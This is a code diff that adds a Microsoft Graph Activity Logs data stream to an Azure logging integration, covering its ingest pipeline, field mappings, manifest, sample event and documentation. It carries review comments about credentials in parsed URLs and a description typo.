azure.graphactivitylogs.properties.request_uri + - http.request.id + - azure.tenant_id + - azure.graphactivitylogs.properties.time_generated + target_field: _id + 
ignore_missing: true + tag: fingerprint-id + - set: + field: cloud.account.id + value: '{{azure.tenant_id}}' + tag: set-cloud_account_id + ignore_empty_value: true + - set: + field: cloud.region + value: '{{destination.geo.region_name}}' + tag: set-cloud_region + ignore_empty_value: true + - set: + field: cloud.service.name + value: 'Microsoft Graph' + tag: set-cloud_region + ignore_empty_value: true + - geoip: + field: client.ip + target_field: client.geo + ignore_missing: true + - geoip: + field: source.ip + target_field: source.geo + ignore_missing: true + # IP Autonomous System (AS) Lookup + - geoip: + database_file: GeoLite2-ASN.mmdb + field: source.ip + target_field: source.as + properties: + - asn + - organization_name + ignore_missing: true + - geoip: + database_file: GeoLite2-ASN.mmdb + field: client.ip + target_field: client.as + properties: + - asn + - organization_name + ignore_missing: true + - rename: + field: source.as.asn + target_field: source.as.number + ignore_missing: true + - rename: + field: source.as.organization_name + target_field: source.as.organization.name + ignore_missing: true + - rename: + field: client.as.asn + target_field: client.as.number + ignore_missing: true + - rename: + field: client.as.organization_name + target_field: client.as.organization.name + ignore_missing: true + - remove: + field: event.original + if: "ctx?.tags == null || !(ctx.tags.contains('preserve_original_event'))" + ignore_missing: true + tag: remove-event_original + - script: + tag: script_to_drop_null_values + lang: painless + description: Drops null/empty values recursively. 
+ source: |- + boolean drop(Object o) { + if (o == null || o == '') { + return true; + } else if (o instanceof Map) { + ((Map) o).values().removeIf(v -> drop(v)); + return (((Map) o).size() == 0); + } else if (o instanceof List) { + ((List) o).removeIf(v -> drop(v)); + return (((List) o).length == 0); + } + return false; + } + drop(ctx); + - set: + field: event.kind + value: pipeline_error + tag: set_pipeline_error + if: ctx.error?.message != null +on_failure: + - append: + field: error.message + value: 'Processor {{{_ingest.on_failure_processor_type}}} with tag {{{_ingest.on_failure_processor_tag}}} in pipeline {{{_ingest.on_failure_pipeline}}} failed with message: {{{_ingest.on_failure_message}}}' + - set: + field: event.kind + value: pipeline_error diff --git a/packages/azure/data_stream/graphactivitylogs/fields/agent.yml b/packages/azure/data_stream/graphactivitylogs/fields/agent.yml new file mode 100644 index 00000000000..b1895d5577a --- /dev/null +++ b/packages/azure/data_stream/graphactivitylogs/fields/agent.yml 
@@ -0,0 +1,62 @@ +- name: cloud.account.id + external: ecs +- name: cloud.availability_zone + external: ecs +- name: cloud.instance.id + external: ecs +- name: cloud.instance.name + external: ecs +- name: cloud.machine.type + external: ecs +- name: cloud.provider + external: ecs +- name: cloud.region + external: ecs +- name: cloud.project.id + external: ecs +- name: cloud.image.id + type: keyword + description: Image ID for the cloud instance. +- name: cloud.service.name + external: ecs +- name: container.id + external: ecs +- name: container.image.name + external: ecs +- name: container.labels + external: ecs +- name: container.name + external: ecs +- name: host.architecture + external: ecs +- name: host.domain + external: ecs +- name: host.hostname + external: ecs +- name: host.id + external: ecs +- name: host.mac + external: ecs +- name: host.name + external: ecs +- name: host.os.family + external: ecs +- name: host.os.kernel + external: ecs +- name: host.os.name + external: ecs +- name: host.os.platform + external: ecs +- name: host.os.version + external: ecs +- name: host.type + external: ecs +- name: host.containerized + type: boolean + description: If the host is a container. +- name: host.os.build + type: keyword + description: OS build information. +- name: host.os.codename + type: keyword + description: OS codename, if any. diff --git a/packages/azure/data_stream/graphactivitylogs/fields/base-fields.yml b/packages/azure/data_stream/graphactivitylogs/fields/base-fields.yml new file mode 100644 index 00000000000..41384c46aba --- /dev/null +++ b/packages/azure/data_stream/graphactivitylogs/fields/base-fields.yml 
@@ -0,0 +1,20 @@ +- name: data_stream.type + type: constant_keyword + description: Data stream type. +- name: data_stream.dataset + type: constant_keyword + description: Data stream dataset name. +- name: data_stream.namespace + type: constant_keyword + description: Data stream namespace. +- name: '@timestamp' + type: date + description: Event timestamp. +- name: event.module + type: constant_keyword + description: Event module + value: azure +- name: event.dataset + type: constant_keyword + description: Event dataset + value: azure.graphactivitylogs diff --git a/packages/azure/data_stream/graphactivitylogs/fields/ecs.yml b/packages/azure/data_stream/graphactivitylogs/fields/ecs.yml new file mode 100644 index 00000000000..b8b7c4f4bfa --- /dev/null +++ b/packages/azure/data_stream/graphactivitylogs/fields/ecs.yml 
@@ -0,0 +1,114 @@ +- name: client.ip + external: ecs +- name: client.geo.city_name + external: ecs +- name: client.geo.continent_name + external: ecs +- name: client.geo.country_iso_code + external: ecs +- name: client.geo.country_name + external: ecs +- name: client.geo.location.lat + external: ecs +- name: client.geo.location.lon + external: ecs +- name: client.geo.region_iso_code + external: ecs +- name: client.geo.region_name + external: ecs +- name: client.user.id + external: ecs +- name: destination.geo.region_name + external: ecs +- name: ecs.version + external: ecs +- name: message + external: ecs +- name: event.action + external: ecs +- name: event.category + external: ecs +- name: event.created + external: ecs +- name: event.duration + external: ecs +- name: event.id + external: ecs +- name: event.ingested + external: ecs +- name: event.kind + external: ecs +- name: event.type + external: ecs +- name: http.request.id + external: ecs +- name: http.request.method + external: ecs +- name: http.response.bytes + external: ecs +- name: http.response.status_code + external: ecs +- name: log.level + external: ecs +- name: related.ip + external: ecs +- name: related.user + external: ecs +- name: source.address + external: ecs +- name: source.geo.city_name + external: ecs +- name: source.geo.continent_name + external: ecs +- name: source.geo.country_iso_code + external: ecs +- name: source.geo.country_name + external: ecs +- name: source.geo.location.lat + external: ecs +- name: source.geo.location.lon + external: ecs +- name: source.geo.region_iso_code + external: ecs +- name: source.geo.region_name + external: ecs +- name: source.ip + external: ecs +- name: url.domain + external: ecs +- name: url.password + external: ecs +- name: url.port + external: ecs +- name: url.username + external: ecs +- name: url.original + external: ecs +- name: url.path + external: ecs +- name: url.query + external: ecs +- name: url.extension + external: ecs +- name: url.scheme + 
external: ecs +- name: url.full + external: ecs +- name: user.id + external: ecs +- external: ecs + name: user_agent.device.name +- external: ecs + name: user_agent.name +- external: ecs + name: user_agent.original +- external: ecs + name: user_agent.os.full +- external: ecs + name: user_agent.os.name +- external: ecs + name: user_agent.os.version +- external: ecs + name: user_agent.version +- name: tags + external: ecs diff --git a/packages/azure/data_stream/graphactivitylogs/fields/fields.yml b/packages/azure/data_stream/graphactivitylogs/fields/fields.yml new file mode 100644 index 00000000000..31ff935bfdf --- /dev/null +++ b/packages/azure/data_stream/graphactivitylogs/fields/fields.yml 
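Review bot: `url.password` and `url.username` are mapped in this file, and the ingest pipeline's `uri_parts` step on `azure.graphactivitylogs.properties.request_uri` (earlier in this diff, with `keep_original: true`) fills them whenever a request URI carries userinfo, so a credential embedded in a Graph request URL would be indexed in cleartext in `url.password` and retained again in `url.original`. If retaining it is not intended, drop it immediately after the `uri_parts` processor, e.g. `- remove:` / `field: url.password` / `ignore_missing: true`, and state the choice in the data stream documentation. Separately, the `user_agent.*` entries list `external: ecs` before `name:` while every other entry in this file lists `name:` first; reordering them keeps the file uniform.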
@@ -0,0 +1,104 @@ +- name: azure.graphactivitylogs + type: group + fields: + - name: category + type: keyword + description: | + Azure Event Category. For example, Graph Activity Logs has value `MicrosoftGraphActivityLogs`. + - name: operation_version + type: keyword + description: | + The Graph API version of the event. + - name: operation_name + type: keyword + description: | + Operation name. + - name: result_signature + type: keyword + description: | + Result signature. + - name: properties + type: group + description: | + Event properties. + fields: + - name: api_version + type: keyword + description: | + The API version of the event. + - name: app_id + type: keyword + description: | + The identifier for the application. + - name: at_content + type: keyword + description: | + Reserved for future use. + - name: billed_size + type: double + description: | + The record size in bytes. + - name: client_auth_method + type: integer + description: | + Indicates how the client was authenticated. For a public client, the value is 0. If client ID and client secret are used, the value is 1. If a client certificate was used for authentication, the value is 2. + - name: client_request_id + type: keyword + description: | + The client request identifier when sent. If no client request identifier is sent, the value will be equal to the operation identifier. + - name: identity_provider + type: keyword + description: | + The identity provider that authenticated the subject of the token. + - name: is_billable + type: boolean + description: | + Specifies whether ingesting the data is billable. When _IsBillable is false ingestion isn't billed to your Azure account. + - name: operation_id + type: keyword + description: | + The identifier for the batch. For non-batched requests, this will be unique per request. For batched requests, this will be the same for all requests in the batch. + - name: request_uri + type: keyword + description: | + The URI of the request. 
+ - name: roles + type: keyword + description: | + The roles in token claims. + - name: scopes + type: keyword + description: | + The scopes in token claims. + - name: service_principal_id + type: keyword + description: | + The identifier of the servicePrincipal making the request. + - name: sign_in_activity_id + type: keyword + description: | + The identifier representing the sign-in activitys. + - name: source_system + type: keyword + description: | + The type of agent the event was collected by. For example, OpsManager for Windows agent, either direct connect or Operations Manager, Linux for all Linux agents, or Azure for Azure Diagnostics. + - name: time_generated + type: date + description: | + The date and time the request was received. + - name: token_issued_at + type: date + description: | + The timestamp the token was issued at. + - name: type + type: keyword + description: | + The name of the table. + - name: user_agent + type: keyword + description: | + The user agent information related to request. + - name: wids + type: keyword + description: | + Denotes the tenant-wide roles assigned to this user. diff --git a/packages/azure/data_stream/graphactivitylogs/fields/package-fields.yml b/packages/azure/data_stream/graphactivitylogs/fields/package-fields.yml new file mode 100644 index 00000000000..44792684f83 --- /dev/null +++ b/packages/azure/data_stream/graphactivitylogs/fields/package-fields.yml 
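Review bot: The `sign_in_activity_id` description has a typo: `The identifier representing the sign-in activitys.` should read `The identifier representing the sign-in activity.`. The `roles`, `scopes` and `wids` descriptions could also mention that the pipeline splits the space-separated claim string into an array (the `split` processors earlier in this diff, and the sample event for `roles` and `wids`), since a reader of the field reference would otherwise expect a single string value.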
@@ -0,0 +1,42 @@ +- name: azure + type: group + fields: + - name: subscription_id + type: keyword + description: | + Azure subscription ID. + - name: correlation_id + type: keyword + description: | + Correlation ID. + - name: tenant_id + type: keyword + description: | + tenant ID. + - name: resource + type: group + fields: + - name: id + type: keyword + description: | + Resource ID. + - name: group + type: keyword + description: | + Resource group. + - name: provider + type: keyword + description: | + Resource type/namespace. + - name: namespace + type: keyword + description: | + Resource type/namespace. + - name: name + type: keyword + description: | + Name. + - name: authorization_rule + type: keyword + description: | + Authorization rule. diff --git a/packages/azure/data_stream/graphactivitylogs/manifest.yml b/packages/azure/data_stream/graphactivitylogs/manifest.yml new file mode 100644 index 00000000000..28d5cef9066 --- /dev/null +++ b/packages/azure/data_stream/graphactivitylogs/manifest.yml 
@@ -0,0 +1,62 @@ +type: logs +title: Microsoft Graph Activity Logs +streams: + - input: "azure-eventhub" + enabled: false + template_path: "azure-eventhub.yml.hbs" + title: "Microsoft Graph Activity Logs" + description: "Collect Microsoft Graph Activity Logs using azure-eventhub input" + vars: + - name: preserve_original_event + required: true + show_user: true + title: Preserve original event + description: Preserves a raw copy of the original event, added to the field `event.original` + type: bool + multi: false + default: false + - name: storage_account_container + type: text + title: Storage Account Container + multi: false + required: false + show_user: false + description: >- + The storage account container where the integration stores the checkpoint data for the consumer group. It is an advanced option to use with extreme care. You MUST use a dedicated storage account container for each Azure log type (activity, sign-in, audit logs, and others). DO NOT REUSE the same container name for more than one Azure log type. See [Container Names](https://docs.microsoft.com/en-us/rest/api/storageservices/naming-and-referencing-containers--blobs--and-metadata#container-names) for details on naming rules from Microsoft. The integration generates a default container name if not specified. + - name: tags + type: text + title: Tags + multi: true + required: true + show_user: false + default: + - azure-graphactivitylogs + - forwarded + - name: processors + type: yaml + title: Processors + multi: false + required: false + show_user: false + description: >- + Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details. 
+ - name: sanitize_newlines + type: bool + title: Sanitizes New Lines + description: Removes new lines in logs to ensure proper formatting of JSON data and avoid parsing issues during processing. + multi: false + required: false + show_user: false + default: false + - name: sanitize_singlequotes + required: true + show_user: false + title: Sanitizes Single Quotes + description: Replaces single quotes with double quotes (single quotes inside double quotes are omitted) in logs to ensure proper formatting of JSON data and avoid parsing issues during processing. + type: bool + multi: false + default: false +# Ensures agents have permissions to write data to `logs-*-*` +elasticsearch: + dynamic_dataset: true + dynamic_namespace: true diff --git a/packages/azure/data_stream/graphactivitylogs/sample_event.json b/packages/azure/data_stream/graphactivitylogs/sample_event.json new file mode 100644 index 00000000000..2f107010c19 --- /dev/null +++ b/packages/azure/data_stream/graphactivitylogs/sample_event.json 
@@ -0,0 +1,131 @@ +{ + "@timestamp": "2024-03-07T10:24:44.793Z", + "azure": { + "correlation_id": "f7839da0-e7d1-4e4f-985a-64937fbge347", + "graphactivitylogs": { + "category": "MicrosoftGraphActivityLogs", + "operation_name": "Microsoft Graph Activity", + "operation_version": "v1.0", + "properties": { + "api_version": "v1.0", + "app_id": "a5a68e32-269a-3c91-a5e2-b9254e67hb29", + "client_auth_method": 2, + "client_request_id": "2fe58790-a848-4a93-9d2c-5645972aejk9", + "identity_provider": "https://sts.windows.net/ab30785b-417f-42a4-b5dc-8f9051718acb/", + "operation_id": "f7839da0-e7d1-4e4f-985a-64937fbge347", + "roles": [ + "Application.Read.All", + "Domain.Read.All", + "GroupMember.Read.All", + "LicenseAssignment.ReadWrite.All", + "Organization.Read.All", + "Policy.Read.ConditionalAccess", + "RoleManagement.Read.Directory", + "Team.ReadBasic.All", + "TeamsTab.Create", + "TeamsTab.Read.All", + "TeamsTab.ReadWrite.All", + "User.Read.All" + ], + "service_principal_id": "f2aq4c71-31e3-5065-91g3-4b2dfbsv50fg", + "sign_in_activity_id": "sign-in_ActivityId", + "time_generated": "2024-03-07T10:24:44.793Z", + "token_issued_at": "2024-03-07T10:19:44.000Z", + "wids": [ + "a207b4d3-0g8d-90cb-bhj5-d80n3121e69" + ] + }, + "result_signature": "200" + }, + "resource": { + "id": "/TENANTS/AB30785B-417F-42A4-B5DC-8F9051718ACB/PROVIDERS/MICROSOFT.AADIAM", + "provider": "MICROSOFT.AADIAM" + }, + "tenant_id": "ab30785b-417f-42a4-b5dc-8f9051718acb" + }, + "client": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.143" + }, + "cloud": { + "account": { + "id": "ab30785b-417f-42a4-b5dc-8f9051718acb" + }, + "provider": "azure", + "region": "France Central", + "service": { + "name": "Microsoft Graph" + } + }, + "destination": { + "geo": { + "region_name": "France Central" + } 
+ }, + "ecs": { + "version": "8.0.0" + }, + "event": { + "action": "Microsoft Graph Activity", + "duration": 1213372224, + "kind": "event", + "original": "{\"Level\":4,\"callerIpAddress\":\"81.2.69.143\",\"category\":\"MicrosoftGraphActivityLogs\",\"correlationId\":\"f7839da0-e7d1-4e4f-985a-64937fbge347\",\"durationMs\":1100725,\"location\":\"France Central\",\"operationName\":\"Microsoft Graph Activity\",\"operationVersion\":\"v1.0\",\"properties\":{\"apiVersion\":\"v1.0\",\"appId\":\"a5a68e32-269a-3c91-a5e2-b9254e67hb29\",\"atContent\":\"\",\"clientAuthMethod\":\"2\",\"clientRequestId\":\"2fe58790-a848-4a93-9d2c-5645972aejk9\",\"durationMs\":1100725,\"identityProvider\":\"https://sts.windows.net/ab30785b-417f-42a4-b5dc-8f9051718acb/\",\"ipAddress\":\"81.2.69.143\",\"location\":\"France Central\",\"operationId\":\"f7839da0-e7d1-4e4f-985a-64937fbge347\",\"requestId\":\"f7839da0-e7d1-4e4f-985a-64937fbge347\",\"requestMethod\":\"GET\",\"requestUri\":\"https://graph.microsoft.com/v1.0/directoryRoles\",\"responseSizeBytes\":4300,\"responseStatusCode\":200,\"roles\":\"Application.Read.All Domain.Read.All GroupMember.Read.All LicenseAssignment.ReadWrite.All Organization.Read.All Policy.Read.ConditionalAccess RoleManagement.Read.Directory Team.ReadBasic.All TeamsTab.Create TeamsTab.Read.All TeamsTab.ReadWrite.All User.Read.All\",\"scopes\":null,\"servicePrincipalId\":\"f2aq4c71-31e3-5065-91g3-4b2dfbsv50fg\",\"signInActivityId\":\"sign-in_ActivityId\",\"tenantId\":\"ab30785b-417f-42a4-b5dc-8f9051718acb\",\"timeGenerated\":\"2024-03-07T10:24:44.7939418Z\",\"tokenIssuedAt\":\"2024-03-07T10:19:44Z\",\"userAgent\":\"\",\"userId\":null,\"wids\":\"a207b4d3-0g8d-90cb-bhj5-d80n3121e69\"},\"resourceId\":\"/TENANTS/AB30785B-417F-42A4-B5DC-8F9051718ACB/PROVIDERS/MICROSOFT.AADIAM\",\"resultSignature\":\"200\",\"tenantId\":\"ab30785b-417f-42a4-b5dc-8f9051718acb\",\"time\":\"2024-03-07T10:24:44.7939418Z\"}", + "type": [ + "access" + ] + }, + "http": { + "request": { + "id": 
"f7839da0-e7d1-4e4f-985a-64937fbge347", + "method": "GET" + }, + "response": { + "bytes": 4300, + "status_code": 200 + } + }, + "log": { + "level": "4" + }, + "related": { + "ip": [ + "81.2.69.143" + ] + }, + "source": { + "geo": { + "city_name": "London", + "continent_name": "Europe", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "location": { + "lat": 51.5142, + "lon": -0.0931 + }, + "region_iso_code": "GB-ENG", + "region_name": "England" + }, + "ip": "81.2.69.143" + }, + "tags": [ + "preserve_original_event" + ], + "url": { + "domain": "graph.microsoft.com", + "extension": "0/directoryRoles", + "original": "https://graph.microsoft.com/v1.0/directoryRoles", + "path": "/v1.0/directoryRoles", + "scheme": "https" + } +} \ No newline at end of file diff --git a/packages/azure/docs/README.md b/packages/azure/docs/README.md index 74a25217402..3c5d32d8c17 100644 --- a/packages/azure/docs/README.md +++ b/packages/azure/docs/README.md @@ -1,6 +1,6 @@ # Azure Logs Integration -The Azure Logs integration collects logs for specific Azure services like Azure Active Directory (Sign-in, Audit, Identity Protection, and Provisioning logs), Azure Spring Apps, Azure Firewall, and several others using the Activity and Platform logs. +The Azure Logs integration collects logs for specific Azure services like Azure Active Directory (Sign-in, Audit, Identity Protection, and Provisioning logs), Azure Spring Apps, Azure Firewall, Microsoft Graph Activity, and several others using the Activity and Platform logs. You can then visualize that data in Kibana, create alerts to notify you if something goes wrong, and reference data when troubleshooting an issue. 
@@ -16,7 +16,7 @@ fail to start due to an exceed quota limit. The Azure Logs integration collects logs. **Logs** help you keep a record of events that happen on your Azure account. -Log data streams collected by the Azure Logs integration include Activity, Platform, Active Directory (Sign-in, Audit, Identity Protection, Provisioning), and Spring Apps logs. +Log data streams collected by the Azure Logs integration include Activity, Platform, Active Directory (Sign-in, Audit, Identity Protection, Provisioning), Microsoft Graph Activity, and Spring Apps logs. ## Requirements 
@@ -266,6 +266,59 @@ The Elastic Agent can use one Storage account container for all integrations. The Agent will use the integration name and the event hub name to identify the blob to store the consumer group information uniquely. +### Running the integration behind a firewall + +When you run the Elastic Agent behind a firewall, to ensure proper communication with the necessary components, you need to allow traffic on port `5671` and `5672` for the Event Hub, and port `443` for the Storage Account container. + +```text +┌────────────────────────────────┐ ┌───────────────────┐ ┌───────────────────┐ +│ │ │ │ │ │ +│ ┌────────────┐ ┌───────────┐ │ │ ┌──────────────┐ │ │ ┌───────────────┐ │ +│ │ diagnostic │ │ event hub │ │ │ │azure-eventhub│ │ │ │ activity logs │ │ +│ │ setting │──▶│ │◀┼AMQP─│ <> │─┼──┼▶│<>│ │ +│ └────────────┘ └───────────┘ │ │ └──────────────┘ │ │ └───────────────┘ │ +│ │ │ │ │ │ │ +│ │ │ │ │ │ │ +│ │ │ │ │ │ │ +│ ┌─────────────┬─────HTTPS─┼──────────┘ │ │ │ +│ ┌───────┼─────────────┼──────┐ │ │ │ │ │ +│ │ │ │ │ │ │ │ │ │ +│ │ ▼ ▼ │ │ └─Agent─────────────┘ └─Elastic Cloud─────┘ +│ │ ┌──────────┐ ┌──────────┐ │ │ +│ │ │ 0 │ │ 1 │ │ │ +│ │ │ <> │ │ <> │ │ │ +│ │ └──────────┘ └──────────┘ │ │ +│ │ │ │ +│ │ │ │ +│ └─Storage Account Container──┘ │ +│ │ +│ │ +└─Azure──────────────────────────┘ +``` + +#### Event Hub + +Port `5671` and `5672` are commonly used for secure communication with the Event Hub. These ports are used to receive events. By allowing traffic on these ports, the Elastic Agent can establish a secure connection with the Event Hub. + +For more information, check the following documents: + +- [What ports do I need to open on the firewall?](https://learn.microsoft.com/en-us/azure/event-hubs/event-hubs-faq#what-ports-do-i-need-to-open-on-the-firewall) from the [Event Hubs frequently asked questions](https://learn.microsoft.com/en-us/azure/event-hubs/event-hubs-faq#what-ports-do-i-need-to-open-on-the-firewall). 
+- [AMQP outbound port requirements](https://learn.microsoft.com/en-us/azure/service-bus-messaging/service-bus-amqp-protocol-guide#amqp-outbound-port-requirements) + +#### Storage Account Container + +Port `443` is used for secure communication with the Storage Account container. This port is commonly used for HTTPS traffic. By allowing traffic on port 443, the Elastic Agent can securely access and interact with the Storage Account container, which is essential for storing and retrieving checkpoint data for each event hub partition. + +#### DNS + +Optionally, you can restrict the traffic to the following domain names: + +```text +*.servicebus.windows.net +*.blob.core.windows.net +*.cloudapp.net +``` + ## Settings Use the following settings to configure the Azure Logs integration when you add it to Fleet. diff --git a/packages/azure/docs/adlogs.md b/packages/azure/docs/adlogs.md index 361b323a64b..22aaf09b19a 100644 --- a/packages/azure/docs/adlogs.md +++ b/packages/azure/docs/adlogs.md @@ -999,7 +999,9 @@ An example event for `auditlogs` looks as following: | azure.auditlogs.operation_version | The operation version | keyword | | azure.auditlogs.properties.activity_datetime | Activity timestamp | date | | azure.auditlogs.properties.activity_display_name | Activity display name | keyword | +| azure.auditlogs.properties.additional_details.key | Additional details key | keyword | | azure.auditlogs.properties.additional_details.user_agent | User agent name. | keyword | +| azure.auditlogs.properties.additional_details.value | Additional details value | keyword | | azure.auditlogs.properties.authentication_protocol | Authentication protocol type. | keyword | | azure.auditlogs.properties.category | category | keyword | | azure.auditlogs.properties.correlation_id | Correlation ID | keyword | diff --git a/packages/azure/docs/eventhub.md b/packages/azure/docs/eventhub.md index 75ef37a725a..b4563e956ac 100644 --- a/packages/azure/docs/eventhub.md 
+++ b/packages/azure/docs/eventhub.md 
@@ -191,7 +191,7 @@ An example event for `eventhub` looks as following:
 | event.action | The action captured by the event. This describes the information in the event. It is more specific than `event.category`. Examples are `group-add`, `process-started`, `file-created`. The value is normally defined by the implementer. | keyword |
 | event.category | This is one of four ECS Categorization Fields, and indicates the second level in the ECS category hierarchy. `event.category` represents the "big buckets" of ECS categories. For example, filtering on `event.category:process` yields all events relating to process activity. This field is closely related to `event.type`, which is used as a subcategory. This field is an array. This will allow proper categorization of some events that fall in multiple categories. | keyword |
 | event.created | event.created contains the date/time when the event was first read by an agent, or by your pipeline. This field is distinct from @timestamp in that @timestamp typically contain the time extracted from the original event. In most situations, these two timestamps will be slightly different. The difference can be used to calculate the delay between your source generating an event, and the time when your agent first processed it. This can be used to monitor your agent's or pipeline's ability to keep up with your event source. In case the two timestamps are identical, @timestamp should be used. | date |
-| event.dataset | Event dataset | constant_keyword |
+| event.dataset | Name of the dataset. If an event source publishes more than one type of log or events (e.g. access log, error log), the dataset is used to specify which one the event comes from. It's recommended but not required to start the dataset name with the module name, followed by a dot, then the dataset name. | keyword |
 | event.duration | Duration of the event in nanoseconds.
If event.start and event.end are known this value should be the difference between the end and start time. | long |
 | event.id | Unique ID to describe the event. | keyword |
 | event.ingested | Timestamp when an event arrived in the central data store. This is different from `@timestamp`, which is when the event originally occurred. It's also different from `event.created`, which is meant to capture the first time an agent saw the event. In normal conditions, assuming no tampering, the timestamps should chronologically look like this: `@timestamp` \< `event.created` \< `event.ingested`. | date |
diff --git a/packages/azure/docs/graphactivitylogs.md b/packages/azure/docs/graphactivitylogs.md
new file mode 100644
index 00000000000..4f6d123ff0a
--- /dev/null
+++ b/packages/azure/docs/graphactivitylogs.md
@@ -0,0 +1,353 @@
+# Microsoft Graph Activity Logs
+
+Microsoft Graph Activity Logs provide an audit trail of all HTTP requests that the Microsoft Graph service has received and processed for a tenant. Microsoft Graph Activity Logs gives full visibility into all transactions made by applications and other API clients that you have consented to in the tenant. Refer to [Microsoft Graph Activity Common Usecases](https://learn.microsoft.com/en-us/graph/microsoft-graph-activity-logs-overview#common-use-cases-for-microsoft-graph-activity-logs) for more use cases.
+
+Tenant administrators can configure the collection and storage destinations of Microsoft Graph Activity Logs through Diagnostic Setting in the Entra Portal. This integration uses Azure Event Hubs destination to stream Microsoft Graph Activity Logs to Elastic.
+
+## Requirements and Setup
+
+### Prerequisites
+
+Following privileges are required to collect Microsoft Graph Activity Logs:
+- A Microsoft Entra ID P1 or P2 tenant license in your tenant.
+- A `Security Administrator` or `Global Administrator` Microsoft Entra ID role to configure the diagnostic settings.
+Refer to [Microsoft Graph Prerequisites](https://learn.microsoft.com/en-us/graph/microsoft-graph-activity-logs-overview#prerequisites) for more information on required privileges.
+
+### Setup
+
+Refer to the [Azure Logs](https://docs.elastic.co/integrations/azure) page for more information about setting up and using this integration.
+
+### Limitations
+
+- Activities of multi-tenant applications belonging to another tenant are not available.
+- In few rare cases, events might take up to 2 hours to be delivered to Event Hubs.
+Refer to [Microsoft Graph Activity Limitations](https://learn.microsoft.com/en-us/graph/microsoft-graph-activity-logs-overview#limitations) for more information.
+
+## Settings
+
+`eventhub` :
+ _string_
+It is a fully managed, real-time data ingestion service. Elastic recommends using only letters, numbers, and the hyphen (-) character for Event Hub names to maximize compatibility. You _can_ use existing Event Hubs having underscores (_) in the Event Hub name; in this case, the integration will replace underscores with hyphens (-) when it uses the Event Hub name to create dependent Azure resources behind the scenes (e.g., the storage account container to store Event Hub consumer offsets). Elastic also recommends using a separate event hub for each log type as the field mappings of each log type differ.
+Default value `insights-operational-logs`.
+
+`consumer_group` :
+_string_
+ The publish/subscribe mechanism of Event Hubs is enabled through consumer groups. A consumer group is a view (state, position, or offset) of an entire event hub. Consumer groups enable multiple consuming applications to each have a separate view of the event stream, and to read the stream independently at their own pace and with their own offsets.
+Default value: `$Default`
+
+`connection_string` :
+_string_
+The connection string required to communicate with Event Hubs, steps [here](https://docs.microsoft.com/en-us/azure/event-hubs/event-hubs-get-connection-string).
+
+A Blob Storage account is required in order to store/retrieve/update the offset or state of the eventhub messages. This means that after stopping the filebeat azure module it can start back up at the spot that it stopped processing messages.
+
+`storage_account` :
+_string_
+The name of the storage account the state/offsets will be stored and updated.
+
+`storage_account_key` :
+_string_
+The storage account key, this key will be used to authorize access to data in your storage account.
+
+`storage_account_container` :
+_string_
+The storage account container where the integration stores the checkpoint data for the consumer group. It is an advanced option to use with extreme care. You MUST use a dedicated storage account container for each Azure log type (activity, sign-in, audit logs, and others). DO NOT REUSE the same container name for more than one Azure log type. See [Container Names](https://docs.microsoft.com/en-us/rest/api/storageservices/naming-and-referencing-containers--blobs--and-metadata#container-names) for details on naming rules from Microsoft. The integration generates a default container name if not specified.
+
+`resource_manager_endpoint` :
+_string_
+Optional, by default we are using the azure public environment, to override, users can provide a specific resource manager endpoint in order to use a different Azure environment.
+
+Resource manager endpoints:
+
+```text
+# Azure ChinaCloud
+https://management.chinacloudapi.cn/
+
+# Azure GermanCloud
+https://management.microsoftazure.de/
+
+# Azure PublicCloud
+https://management.azure.com/
+
+# Azure USGovernmentCloud
+https://management.usgovcloudapi.net/
+```
+
+## Logs
+
+### graphactivitylogs
+
+The `graphactivitylogs` data stream of the Azure Logs package will collect Microsoft Graph activity events that have been streamed through an azure event hub.
+
+An example event for `graphactivitylogs` looks as following:
+
+```json
+{
+ "@timestamp": "2024-03-07T10:24:44.793Z",
+ "azure": {
+ "correlation_id": "f7839da0-e7d1-4e4f-985a-64937fbge347",
+ "graphactivitylogs": {
+ "category": "MicrosoftGraphActivityLogs",
+ "operation_name": "Microsoft Graph Activity",
+ "operation_version": "v1.0",
+ "properties": {
+ "api_version": "v1.0",
+ "app_id": "a5a68e32-269a-3c91-a5e2-b9254e67hb29",
+ "client_auth_method": 2,
+ "client_request_id": "2fe58790-a848-4a93-9d2c-5645972aejk9",
+ "identity_provider": "https://sts.windows.net/ab30785b-417f-42a4-b5dc-8f9051718acb/",
+ "operation_id": "f7839da0-e7d1-4e4f-985a-64937fbge347",
+ "roles": [
+ "Application.Read.All",
+ "Domain.Read.All",
+ "GroupMember.Read.All",
+ "LicenseAssignment.ReadWrite.All",
+ "Organization.Read.All",
+ "Policy.Read.ConditionalAccess",
+ "RoleManagement.Read.Directory",
+ "Team.ReadBasic.All",
+ "TeamsTab.Create",
+ "TeamsTab.Read.All",
+ "TeamsTab.ReadWrite.All",
+ "User.Read.All"
+ ],
+ "service_principal_id": "f2aq4c71-31e3-5065-91g3-4b2dfbsv50fg",
+ "sign_in_activity_id": "sign-in_ActivityId",
+ "time_generated": "2024-03-07T10:24:44.793Z",
+ "token_issued_at": "2024-03-07T10:19:44.000Z",
+ "wids": [
+ "a207b4d3-0g8d-90cb-bhj5-d80n3121e69"
+ ]
+ },
+ "result_signature": "200"
+ },
+ "resource": {
+ "id": "/TENANTS/AB30785B-417F-42A4-B5DC-8F9051718ACB/PROVIDERS/MICROSOFT.AADIAM",
+ "provider": "MICROSOFT.AADIAM"
+ },
+ "tenant_id": "ab30785b-417f-42a4-b5dc-8f9051718acb"
+ },
+ "client": {
+ "geo": {
+ "city_name": "London",
+ "continent_name": "Europe",
+ "country_iso_code": "GB",
+ "country_name": "United Kingdom",
+ "location": {
+ "lat": 51.5142,
+ "lon": -0.0931
+ },
+ "region_iso_code": "GB-ENG",
+ "region_name": "England"
+ },
+ "ip": "81.2.69.143"
+ },
+ "cloud": {
+ "account": {
+ "id": "ab30785b-417f-42a4-b5dc-8f9051718acb"
+ },
+ "provider": "azure",
+ "region": "France Central",
+ "service": {
+ "name": "Microsoft Graph"
+ }
+ },
+ "destination": {
+ "geo": {
+ "region_name": "France Central"
+ }
+ },
+ "ecs": {
+ "version": "8.0.0"
+ },
+ "event": {
+ "action": "Microsoft Graph Activity",
+ "duration": 1213372224,
